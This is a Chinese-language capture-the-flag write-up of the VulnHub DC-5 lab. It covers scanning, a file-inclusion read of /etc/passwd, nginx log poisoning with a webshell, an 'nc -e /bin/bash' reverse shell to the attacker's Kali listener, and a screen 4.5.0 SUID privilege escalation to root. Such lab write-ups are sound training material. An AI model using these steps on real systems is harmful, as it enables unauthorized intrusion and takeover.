VulnHub_DC-5渗透流程

发布时间 2023-06-28 16:06:25作者: Mar10

DC-5

主机探测

nmap 192.168.157.0/24

访问网站

探测网站得知是Nginx

目录扫描

在Contact处可以提交东西,抓个包,发现在thankyou.php界面时间年份会变,应该是调用了别的文件,扫个

dirsearch -u 192.168.157.149

文件包含漏洞

果然,那么肯定存在文件包含,尝试常见的变量file

http://192.168.157.149/thankyou.php?file=/etc/passwd

执行成功

接下来的思路就是传入木马,蚁剑连接

利用Nginx的错误日志,/var/log/nginx/error.log可以查看是否传入成功

蚁剑反弹shell

传入成功,那直接上蚁剑,url就是http://192.168.157.149/thankyou.php?file=/var/log/nginx/error.log

连接成功,那弹个shell

kali上开启监听

nc -lnvp 9999

蚁剑反弹

nc -e /bin/bash kali的ip	监听端口

在弹个交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权

查找具有SUID权限的文件

find / -perm -4000 -print 2>/dev/null

查找漏洞,拷贝到当前路径

searchsploit screen 4.5.0

searchsploit -m 41154

也可以用locate命令查看路径再cp

查看后发现要在/tmp下运行

将此文件通过蚁剑上传

chmod +x 41154.sh

赋予执行权限

运行得到root权限

得到flag